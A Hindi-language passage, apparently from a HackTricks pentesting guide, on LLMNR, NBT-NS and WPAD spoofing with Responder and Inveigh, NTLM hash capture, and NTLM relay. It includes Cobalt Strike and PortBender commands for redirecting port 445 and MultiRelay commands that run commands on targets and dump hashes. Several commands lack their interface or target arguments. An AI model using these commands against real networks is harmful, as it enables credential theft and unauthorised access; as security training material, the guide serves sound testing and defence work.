# Spoofing LLMNR, NBT-NS, mDNS/DNS और WPAD और Relay Attacks {{#include ../../banners/hacktricks-training.md}} ## Network Protocols ### Local Host Resolution Protocols - **LLMNR, NBT-NS, और mDNS**: - Microsoft और अन्य ऑपरेटिंग सिस्टम DNS विफल होने पर स्थानीय नाम समाधान के लिए LLMNR और NBT-NS का उपयोग करते हैं। इसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं। - ये प्रोटोकॉल UDP पर अपनी अनधिकृत, प्रसारण प्रकृति के कारण इंटरसेप्शन और स्पूफिंग के प्रति संवेदनशील हैं। - [Responder](https://github.com/lgandx/Responder) का उपयोग इन प्रोटोकॉल को क्वेरी करने वाले होस्ट को जाली प्रतिक्रियाएँ भेजकर सेवाओं का अनुकरण करने के लिए किया जा सकता है। - Responder का उपयोग करके सेवा अनुकरण पर अधिक जानकारी [यहाँ](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) मिल सकती है। ### Web Proxy Auto-Discovery Protocol (WPAD) - WPAD ब्राउज़रों को स्वचालित रूप से प्रॉक्सी सेटिंग्स खोजने की अनुमति देता है। - खोज DHCP, DNS, या DNS विफल होने पर LLMNR और NBT-NS पर वापस जाकर की जाती है। - Responder WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुर्भावनापूर्ण WPAD सर्वरों की ओर निर्देशित करता है। ### Responder for Protocol Poisoning - **Responder** एक उपकरण है जिसका उपयोग LLMNR, NBT-NS, और mDNS क्वेरीज़ को ज़हर देने के लिए किया जाता है, जो क्वेरी प्रकारों के आधार पर चयनात्मक रूप से प्रतिक्रिया करता है, मुख्य रूप से SMB सेवाओं को लक्षित करता है। - यह Kali Linux में पूर्व-स्थापित आता है, जिसे `/etc/responder/Responder.conf` पर कॉन्फ़िगर किया जा सकता है। - Responder स्क्रीन पर कैप्चर किए गए हैश प्रदर्शित करता है और उन्हें `/usr/share/responder/logs` निर्देशिका में सहेजता है। - यह IPv4 और IPv6 दोनों का समर्थन करता है। - Responder का Windows संस्करण [यहाँ](https://github.com/lgandx/Responder-Windows) उपलब्ध है। #### Running Responder - डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: `responder -I ` - अधिक आक्रामक प्रोबिंग के लिए (संभावित दुष्प्रभावों के साथ): `responder -I -P -r -v` - आसान क्रैकिंग के लिए NTLMv1 चुनौतियों/प्रतिक्रियाओं को कैप्चर करने की तकनीकें: `responder -I --lm --disable-ess` - WPAD अनुकरण को सक्रिय किया जा सकता है: `responder -I --wpad` - NetBIOS अनुरोधों को हमलावर के IP पर हल किया जा सकता है, और एक प्रमाणीकरण प्रॉक्सी स्थापित की जा सकती है: `responder.py -I -Pv` ### DHCP Poisoning with Responder - DHCP प्रतिक्रियाओं को स्पूफ करना एक पीड़ित की रूटिंग जानकारी को स्थायी रूप से ज़हर दे सकता है, ARP ज़हर देने के लिए एक अधिक छिपा हुआ विकल्प प्रदान करता है। - यह लक्षित नेटवर्क की कॉन्फ़िगरेशन के बारे में सटीक ज्ञान की आवश्यकता होती है। - हमले को चलाना: `./Responder.py -I eth0 -Pdv` - यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क में व्यवधान से बचने के लिए सावधानीपूर्वक हैंडलिंग की आवश्यकता होती है। ### Capturing Credentials with Responder - Responder उपरोक्त प्रोटोकॉल का उपयोग करके सेवाओं का अनुकरण करेगा, जब एक उपयोगकर्ता स्पूफ की गई सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है, तो क्रेडेंशियल्स (आमतौर पर NTLMv2 Challenge/Response) कैप्चर करता है। - NetNTLMv1 में डाउनग्रेड करने या आसान क्रेडेंशियल क्रैकिंग के लिए ESS को निष्क्रिय करने का प्रयास किया जा सकता है। यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, उचित प्राधिकरण सुनिश्चित करना और व्यवधान या अनधिकृत पहुंच से बचना चाहिए। ## Inveigh Inveigh एक उपकरण है जो पेनिट्रेशन टेस्टर्स और रेड टीमर्स के लिए डिज़ाइन किया गया है, जो Windows सिस्टम के लिए है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, जिसमें [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) और [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देश [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) में मिल सकते हैं। Inveigh को PowerShell के माध्यम से संचालित किया जा सकता है: ```powershell Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y ``` या C# बाइनरी के रूप में निष्पादित किया गया: ```bash Inveigh.exe ``` ### NTLM Relay Attack यह हमला SMB प्रमाणीकरण सत्रों का उपयोग करके एक लक्षित मशीन तक पहुँचने के लिए किया जाता है, यदि सफल हो तो एक सिस्टम शेल प्रदान करता है। मुख्य पूर्वापेक्षाएँ शामिल हैं: - प्रमाणीकरण करने वाले उपयोगकर्ता को रिले किए गए होस्ट पर स्थानीय व्यवस्थापक पहुँच होनी चाहिए। - SMB साइनिंग को अक्षम किया जाना चाहिए। #### 445 Port Forwarding and Tunneling उन परिदृश्यों में जहाँ सीधे नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफ़िक को अग्रेषित और टनल करने की आवश्यकता होती है। [**PortBender**](https://github.com/praetorian-inc/PortBender) जैसे उपकरण पोर्ट 445 के ट्रैफ़िक को दूसरे पोर्ट पर पुनर्निर्देशित करने में मदद करते हैं, जो तब आवश्यक होता है जब ड्राइवर लोड करने के लिए स्थानीय व्यवस्थापक पहुँच उपलब्ध हो। PortBender सेटअप और संचालन Cobalt Strike में: ```bash Cobalt Strike -> Script Manager -> Load (Select PortBender.cna) beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory beacon> upload C:\PortBender\WinDivert64.sys # Upload driver beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445 beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server beacon> socks 1080 # Establish a SOCKS proxy on port 1080 # Termination commands beacon> jobs beacon> jobkill 0 beacon> rportfwd stop 8445 beacon> socks stop ``` ### NTLM रिले हमले के लिए अन्य उपकरण - **Metasploit**: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें। - **smbrelayx**: SMB सत्रों को रिले करने और कमांड निष्पादित करने या बैकडोर तैनात करने के लिए एक Python स्क्रिप्ट। - **MultiRelay**: Responder सूट से एक उपकरण जो विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड निष्पादित करने या हैश डंप करने के लिए है। यदि आवश्यक हो, तो प्रत्येक उपकरण को SOCKS प्रॉक्सी के माध्यम से संचालित करने के लिए कॉन्फ़िगर किया जा सकता है, जिससे अप्रत्यक्ष नेटवर्क पहुंच के साथ भी हमले सक्षम होते हैं। ### MultiRelay संचालन MultiRelay _**/usr/share/responder/tools**_ निर्देशिका से निष्पादित किया जाता है, विशिष्ट IPs या उपयोगकर्ताओं को लक्षित करता है। ```bash python MultiRelay.py -t -u ALL # Relay all users python MultiRelay.py -t -u ALL -c whoami # Execute command python MultiRelay.py -t -u ALL -d # Dump hashes # Proxychains for routing traffic ``` ये उपकरण और तकनीकें विभिन्न नेटवर्क वातावरण में NTLM Relay हमलों को करने के लिए एक व्यापक सेट बनाती हैं। ### NTLM लॉगिन को मजबूर करना Windows में आप **कुछ विशेषाधिकार प्राप्त खातों को मनमाने मशीनों पर प्रमाणीकरण करने के लिए मजबूर कर सकते हैं**। जानने के लिए निम्नलिखित पृष्ठ पढ़ें: {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}} ## संदर्भ - [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) - [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/) - [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/) - [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/) - [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) {{#include ../../banners/hacktricks-training.md}}